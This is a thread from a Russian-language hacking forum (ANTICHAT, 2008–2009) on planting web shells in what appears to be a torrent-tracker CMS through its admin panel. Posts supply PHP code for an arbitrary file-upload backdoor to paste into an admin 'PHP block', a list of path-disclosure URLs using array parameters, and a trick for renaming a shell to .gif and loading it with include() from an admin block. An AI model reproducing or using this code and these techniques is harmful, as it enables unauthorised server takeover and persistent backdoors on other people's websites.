ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.12.2008, 22:09
|
|
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
Провел на форуме:
1608432
Репутация:
158
|
|
через админку, создеш блок и вписываеш туда код шелла
|
|
|
22.12.2008, 00:16
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
Нет, при добавлении блока он ещё своё добавляет  |
|
|
|
23.12.2008, 14:50
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 69
Провел на форуме:
458484
Репутация:
31
|
|
Код:
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Файло ".$_FILES['file']['name']." загружен";
} else {
print "Не удаётся загрузить файло. Инфа:\n";
print_r($_FILES);
}
}
break;
}
?>
</pre>
Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете. |
|
|
|
02.01.2009, 03:25
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 5
Провел на форуме:
25077
Репутация:
4
|
|
Раскрытие путей:
Код:
recover.php?id[]=
email-gateway.php?id[]=
takeconfirm.php?id[]=
takeinvite.php?id[]=
topten.php?lim[]=
topten.php?type[]=
|
|
|
|
09.01.2009, 20:35
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019
Репутация:
214
|
|
|
|
|
|
11.01.2009, 21:10
|
|
Новичок
Регистрация: 11.01.2009
Сообщений: 1
Провел на форуме:
8986
Репутация:
0
|
|
Подскажите, пожалуйста, способ залить шелл, зайдя в админку. Способ через php-блок не катит, т.к. на папке выставлены права не позволяющие в неё писать (((
Если можно подробно.
|
|
|
|
12.01.2009, 14:10
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
aledain, должны стоять права 777.
Если они не стоят как ты сказал - тебе не повезло просто...
|
|
|
|
13.01.2009, 04:44
|
|
Новичок
Регистрация: 11.08.2008
Сообщений: 8
Провел на форуме:
40881
Репутация:
7
|
|
Сообщение от Arigona
aledain, должны стоять права 777.
Если они не стоят как ты сказал - тебе не повезло просто...
Не обязательно 777 иногда скрипт принудительно записывает блок хоть и ругается на отсутствие прав нл это как уже упоминалось выше- как повезет
|
|
|
|
13.01.2009, 17:03
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 5
Провел на форуме:
16201
Репутация:
0
|
|
?
Сообщение от Uname-A
Код:
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Файло ".$_FILES['file']['name']." загружен";
} else {
print "Не удаётся загрузить файло. Инфа:\n";
print_r($_FILES);
}
}
break;
}
?>
</pre>
Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете. у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
|
|
|
|
13.01.2009, 17:36
|
|
Новичок
Регистрация: 11.08.2008
Сообщений: 8
Провел на форуме:
40881
Репутация:
7
|
|
Сообщение от pacan4ik
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
Лучше залей гифный шелл и с инклудь его с админки
Смени расширение шелла с php на gif залей на серв
в админке создай php блок и сунь туда этот код
например так
include("torrents/images/44776.gif");
потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл
Последний раз редактировалось Red Virus; 13.01.2009 в 17:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
